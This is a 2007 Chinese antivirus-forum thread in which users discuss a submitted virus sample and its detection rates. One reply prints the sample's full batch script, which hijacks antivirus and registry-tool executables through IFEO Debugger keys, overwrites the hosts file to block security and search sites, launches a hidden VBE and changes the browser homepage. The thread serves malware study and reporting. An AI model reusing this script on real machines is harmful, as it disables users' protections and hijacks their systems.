楼主: 金剑
收起左侧

[病毒样本] I'm JJ

[复制链接]
bb624
发表于 2007-5-13 17:39:05 | 显示全部楼层
过了不少啊,目前是过了卡巴,红伞,蜘蛛,nod.
金剑
头像被屏蔽
 楼主| 发表于 2007-5-13 18:19:39 | 显示全部楼层
上报Ing
小邪邪
发表于 2007-5-13 18:26:00 | 显示全部楼层
MCAFEE没报  

AVK报了
solcroft
发表于 2007-5-13 18:27:12 | 显示全部楼层
这是什么东西,竟然会ping风暴胜者的主页?
看样子来貌似是恶意批处理,修改系统日期,添加注册表IFEO项目,修改hosts文件,只是作者不太精,写出来个没效果的废材东西...

  1. @ECHO OFF
  2. date 1993-1-1
  3. ping www.v0day.com
  4. del c:\u.vbe
  5. echo. wscript.createobject("wscript.shell").run """Call.bat"" /start",0 >> c:\u.vbe
  6. set name=Call
  7. copy %0 C:\Program Files\Outlook Express\%name%.bat
  8. copy %0 C:\Call.bat
  9. copy C:\WINDOWS\system32\ctfmon.exe C:\WINDOWS\system32\ctfm0n.exe
  10. set lujing=C:\Call.bat
  11. set KEY2=CurrentVersion\Image File Execution Options
  12. set KEY=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\%KEY2%
  13. reg add "%KEY%\Mcshield5.exe" /v Debugger /d %lujing% /f
  14. reg add "%KEY%\VsTskMgr.exe" /v Debugger /d %lujing% /f
  15. reg add "%KEY%\naPrdMgr.exe" /v Debugger /d %lujing% /f
  16. reg add "%KEY%\UpdaterUI.exe" /v Debugger /d %lujing% /f
  17. reg add "%KEY%\TBMon.exe" /v Debugger /d %lujing% /f
  18. reg add "%KEY%\scan32.exe" /v Debugger /d %lujing% /f
  19. reg add "%KEY%\Ravmond.exe" /v Debugger /d %lujing% /f
  20. reg add "%KEY%\CCenter.exe" /v Debugger /d %lujing% /f
  21. reg add "%KEY%\RavTask.exe" /v Debugger /d %lujing% /f
  22. reg add "%KEY%\Rav.exe" /v Debugger /d %lujing% /f
  23. reg add "%KEY%\Ravmon.exe" /v Debugger /d %lujing% /f
  24. reg add "%KEY%\RavmonD.exe" /v Debugger /d %lujing% /f
  25. reg add "%KEY%\RavStub.exe" /v Debugger /d %lujing% /f
  26. reg add "%KEY%\KVXP.kxp" /v Debugger /d %lujing% /f
  27. reg add "%KEY%\kvMonXP.kxp" /v Debugger /d %lujing% /f
  28. reg add "%KEY%\KVCenter.kxp" /v Debugger /d %lujing% /f
  29. reg add "%KEY%\KVSrvXP.exe" /v Debugger /d %lujing% /f
  30. reg add "%KEY%\360safe.exe" /v Debugger /d %lujing% /f
  31. reg add "%KEY%\360rpt.exe" /v Debugger /d %lujing% /f
  32. reg add "%KEY%\KRegEx.exe" /v Debugger /d %lujing% /f
  33. reg add "%KEY%\UIHost.exe" /v Debugger /d %lujing% /f
  34. reg add "%KEY%\TrojDie.kxp" /v Debugger /d %lujing% /f
  35. reg add "%KEY%\FrogAgent.exe" /v Debugger /d %lujing% /f
  36. reg add "%KEY%\regedit.exe" /v Debugger /d %lujing% /f
  37. reg add "%KEY%\Regedt32.exe" /v Debugger /d %lujing% /f
  38. reg add "%KEY%\修复工具.exe" /v Debugger /d %lujing% /f
  39. reg add "%KEY%\freepp.exe" /v Debugger /d %lujing% /f
  40. reg add "%KEY%\free.exe" /v Debugger /d %lujing% /f
  41. reg add "%KEY%\Kav.exe" /v Debugger /d %lujing% /f
  42. reg add "%KEY%\avp.exe" /v Debugger /d %lujing% /f
  43. reg add "%KEY%\kavsvc.exe" /v Debugger /d %lujing% /f
  44. reg add "%KEY%\icesword.exe" /v Debugger /d %lujing% /f
  45. reg add "%KEY%\ctfmon.exe" /v Debugger /d wscript.exe c:\u.vbe /f
  46. C:\WINDOWS\system32\ctfm0n.exe
  47. %BV20082% 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts
  48. %BV20082% 127.0.0.1 www.baidu.com >> %windir%\system32\drivers\etc\hosts
  49. %BV20082% 127.0.0.1 www.jiangmin.com >> %windir%\system32\drivers\etc\hosts
  50. %BV20082% 127.0.0.1 www.baidu.cn >> %windir%\system32\drivers\etc\hosts
  51. %BV20082% 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts
  52. %BV20082% 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts
  53. %BV20082% 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts
  54. %BV20082% 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
  55. %BV20082% 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
  56. %BV20082% 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts
  57. %BV20082% 127.0.0.1 www.microsoft.de >> %windir%\system32\drivers\etc\hosts
  58. %BV20082% 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts
  59. %BV20082% 127.0.0.1 www.sophos.de >> %windir%\system32\drivers\etc\hosts
  60. %BV20082% 127.0.0.1 www.symantec.com >> %windir%\system32\drivers\etc\hosts
  61. %BV20082% 127.0.0.1 www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
  62. %BV20082% 127.0.0.1 www.spychecker.com >> %windir%\system32\drivers\etc\hosts
  63. %BV20082% 127.0.0.1 www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
  64. %BV20082% 127.0.0.1 www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
  65. %BV20082% 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
  66. %BV20082% 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts
  67. %BV20082% 127.0.0.1 www.yahoo.de >> %windir%\system32\drivers\etc\hosts
  68. %BV20082% 127.0.0.1 www.lycos.com >> %windir%\system32\drivers\etc\hosts
  69. %BV20082% 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts
  70. %BV20082% 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
  71. %BV20082% 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
  72. %BV20082% 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
  73. %BV20082% 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
  74. %BV20082% 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
  75. %BV20082% 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
  76. %BV20082% 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
  77. %BV20082% 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
  78. %BV20082% 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
  79. %BV20082% 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
  80. %BV20082% 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
  81. %BV20082% 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
  82. %BV20082% 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
  83. %BV20082% 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
  84. %BV20082% 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
  85. %BV20082% 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
  86. %BV20082% 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
  87. %BV20082% 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
  88. %BV20082% 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
  89. %BV20082% 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
  90. %BV20082% 127.0.0.1 www.kingsoft.com >> %windir%\system32\drivers\etc\hosts
  91. %BV20082% 127.0.0.1 www.rising.com >> %windir%\system32\drivers\etc\hosts
  92. %BV20082% 127.0.0.1 www.rising.com.cn >> %windir%\system32\drivers\etc\hosts
  93. %BV20082% 127.0.0.1 www.mmsk.com >> %windir%\system32\drivers\etc\hosts
  94. %BV20082% 127.0.0.1 shadu.baidu.com >> %windir%\system32\drivers\etc\hosts
  95. %BV20082% 127.0.0.1 online.rising.com.cn >> %windir%\system32\drivers\etc\hosts

  96. set zhuye=Start P
  97. set ceye=ge_URL
  98. set sdfds=HKEY_CURRENT_USER
  99. set ause=\Microsoft\Internet

  100. reg add "%sdfds%\Software%ause%Explorer\Main" /v "%zhuye%age" /t reg_sz /d http://bbs1.xinwen520.com/ /f
  101. reg add "%sdfds%\Software%ause%Explorer\Explorer\Main" /v "Default_Pa%ceye%" /t reg_sz /d http://bbs1.xinwen520.com/ /f
复制代码
金剑
头像被屏蔽
 楼主| 发表于 2007-5-13 18:34:20 | 显示全部楼层
PS 2008??
ping www.v0day.com???
jlennon
头像被屏蔽
发表于 2007-5-13 18:50:10 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
dikex
发表于 2007-5-13 18:50:56 | 显示全部楼层
非常无聊的一个批处理
The EQs
发表于 2007-5-13 18:51:27 | 显示全部楼层
直接上报给eset。。。。。。让他们分析。。。
dikex
发表于 2007-5-13 19:28:13 | 显示全部楼层
原帖由 EQ2 于 2007-5-13 18:51 发表
直接上报给eset。。。。。。让他们分析。。。



我看还是算了,这东西根本不是什么汇编做的,只是写了个vbs和会出错的bat,然后用winrar制作为自解压缩包,完全没有技术含量
caocao
发表于 2007-5-13 19:34:18 | 显示全部楼层
KIS621
已删除: 木马程序 Trojan.BAT.Agent.r        文件: D:\Downloads\VirusScan.rar/VirusScan.exe//data.rar/Call.bat
已删除: 木马程序 Trojan.BAT.Agent.r        文件: D:\Downloads\VirusScan.rar/VirusScan.exe//data.rar/u.vbe
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 13:16 , Processed in 0.092230 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表